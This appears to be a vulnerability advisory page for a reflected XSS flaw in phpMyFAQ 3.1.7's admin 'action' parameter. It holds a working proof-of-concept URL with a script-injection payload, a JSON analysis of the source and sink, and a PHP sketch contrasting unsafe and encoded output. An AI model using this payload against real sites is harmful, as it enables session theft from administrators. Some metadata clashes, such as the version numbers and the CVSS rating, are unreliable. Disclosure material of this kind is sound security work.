Vendor: phpMyFAQ
By: CodeSecLab
CVSS: 6.1 (HIGH)
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
CWE: 79
Product Name: phpMyFAQ
Affected Version From: 3.1.2007
Affected Version To: 3.1.2007
Patch Exists: NO
Related CVE: CVE-2022-4407
CPE: a:phpmyfaq:phpmyfaq:3.1.7
Metasploit:
Platforms Tested: Ubuntu, Windows
2024

phpMyFAQ 3.1.7 – Reflected Cross-Site Scripting (XSS)

A reflected cross-site scripting (XSS) vulnerability was found in phpMyFAQ version 3.1.7. By injecting malicious script code into the 'action' parameter of the URL, an attacker can execute arbitrary scripts in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, input coming from the user should be validated, sanitized, and properly encoded before being used in HTML attributes. It is recommended to apply patches provided by the vendor as soon as they are available.
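
The mitigation above, sketched as an added PHP example (not phpMyFAQ's code and not the vendor's patch): the same request value is placed into a form's action attribute once raw and once after allowlist validation and context-appropriate encoding. The names `ALLOWED_ACTIONS`, `attr`, `formTagUnsafe`, `formTagSafe` and the form markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist; a real one would list the application's admin actions.
const ALLOWED_ACTIONS = ['dashboard', 'config', 'logout'];

/** Encode a value for use inside a quoted HTML attribute. */
function attr(string $value): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern: the raw value lands inside action="...". */
function formTagUnsafe(string $action): string
{
    return '<form action="index.php?action=' . $action . '" method="post">';
}

/** Hardened: allowlist first, then URL-encode, then attribute-encode. */
function formTagSafe(string $action): string
{
    if (!in_array($action, ALLOWED_ACTIONS, true)) {
        $action = 'dashboard'; // unknown values fall back to a fixed default
    }
    $url = 'index.php?action=' . rawurlencode($action);
    return '<form action="' . attr($url) . '" method="post">';
}

// Constructed input: the 'action' value from the page's payload, as PHP
// would see it after URL-decoding the query string.
$fromRequest = '"><script>alert(\'XSS\')</script>';

echo formTagUnsafe($fromRequest), PHP_EOL; // quote closes the attribute early
echo formTagSafe($fromRequest), PHP_EOL;   // value rejected, default action used
echo attr($fromRequest), PHP_EOL;          // encoding alone keeps it inside the attribute
```

Encoding has to match the sink: `htmlspecialchars` with `ENT_QUOTES` is sufficient for a quoted attribute like this one, but not for values written into inline JavaScript or unquoted attributes.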

Exploit-DB raw data:

# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407

PoC: 
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>

Details: 
{
    "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
    "Vulnerable Variable": "action",
    "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
    "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
    "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
    "Attack Payload": "\"><script>alert('XSS')</script>",
    "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
    "Request Parameters": "action",
    "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
    "Request Method": "GET",
    "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}

[Replace Your Domain Name]